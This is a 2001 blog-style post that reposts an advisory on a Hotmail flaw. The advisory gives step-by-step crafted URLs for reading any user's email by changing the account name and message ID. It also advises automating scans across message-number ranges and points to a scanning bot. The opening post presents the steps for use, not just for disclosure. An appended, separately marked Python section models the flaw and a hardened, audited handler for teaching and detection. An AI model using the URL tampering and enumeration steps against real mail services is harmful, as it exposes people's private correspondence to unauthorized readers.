All Hotmail accounts visible to anyone!

Posted on 21 August 2001 – 10:21 | by storm | 4,179 reads

Oh, Microsoft. From the company that created the "universal login" comes a new bug that lets any Hotmail user view the messages of any other user. It is a simple but terrible exploit. We do not know whether it will already have been fixed by the time we publish this news, but the details of how to view anyone's mail follow.

—=[ Three Steps To View Someones Emails In Hotmail ]=—

(Tested with Internet Explorer 5)

To view a full email from someone else's account, do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view a specific message from a specific user:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

From that link change values:
MSG943322803%2e16 (Message ID number, it's simply a counter. %2e = .)
username (Hotmail account name to view)

(remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you don't like the Hotmail frame on top.)

3. Done. If you entered a correct message number & that user has it, you will see it. 🙂
(Test it with your own other hotmail account messages first to get the idea working.)

—=[ ideas and comments for improved viewing / scan ]=—

Now typing those message numbers manually is too much
work, you could create a small utility to automatically
scan given range of messages from specific user name.
(You need to build it to work with IE, as you must be
logged in hotmail when you want to view messages..)

It also helps to know that from the message numbers
in your own Hotmail inbox, you can see about what time
each message number was used, e.g.:

MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you don't need to scan as many message addresses
when you know which range you are looking at.

(Check out Hotmail Scanner Bot aka. hobo for automatic scanning.)

Test messages: (Log in to Hotmail, then use the links to view a message from my test account)

raw format view: (can copy base64 encoded files too)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26raw%3d0%26login%3djokutesti99%26domain%3dhotmail%2ecom

email box view: (can see any attached images directly etc.)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26login%3djokutesti99%26domain%3dhotmail%2ecom

—=[………… Research by wAwAsAn4 …………..]=—
—=[……….. wAwAsAn4@root-core.com ………….]=—
—=[…………….. 17.08.2001 ……………….]=—
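
The advisory above describes a missing authorization check: any logged-in session is accepted, and the mailbox is chosen by the `login` value inside `hm___qs`. The following added example (not from the original post and not Hotmail's code) models that behaviour beside a handler that takes the mailbox owner from the session and logs mismatches; the store, function names, account names and message ids are constructed assumptions.

```python
from urllib.parse import parse_qs

# Constructed mailbox store keyed by (owner, message id); all names are hypothetical.
MAILBOXES = {
    ("alice", "MSG0000000001.1"): "alice's private mail",
    ("bob", "MSG0000000002.1"): "bob's private mail",
}

def inner_params(saferd_query):
    """Decode the percent-encoded hm___qs value that saferd passes on to getmsg."""
    outer = parse_qs(saferd_query)
    inner = parse_qs(outer.get("hm___qs", [""])[0])
    return {name: values[0] for name, values in inner.items()}

def lookup(owner, msg_id):
    body = MAILBOXES.get((owner, msg_id))
    return (200, body) if body is not None else (404, "no such message")

def getmsg_vulnerable(session_user, saferd_query):
    """Model of the flaw: being logged in is the only check, and the
    mailbox is selected by the client-supplied login parameter."""
    if session_user is None:
        return 401, "login required"
    q = inner_params(saferd_query)
    return lookup(q.get("login"), q.get("msg"))

def getmsg_hardened(session_user, saferd_query, audit_log):
    """The mailbox owner comes from the session only; a login parameter that
    names another account is refused before any lookup and recorded."""
    if session_user is None:
        return 401, "login required"
    q = inner_params(saferd_query)
    claimed = q.get("login")
    if claimed is not None and claimed != session_user:
        audit_log.append({"event": "mailbox_owner_mismatch",
                          "session": session_user, "claimed": claimed})
        return 403, "forbidden"
    return lookup(session_user, q.get("msg"))

if __name__ == "__main__":
    # Constructed request: alice's session asks for a message in bob's mailbox.
    query = "_lang=EN&hm___qs=%26msg%3dMSG0000000002%2e1%26login%3dbob"
    log = []
    print(getmsg_vulnerable("alice", query))
    print(getmsg_hardened("alice", query, log), log)
```

The mismatch record doubles as a detection signal: one session naming many different accounts, or walking sequential message ids, stands out in the audit log.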
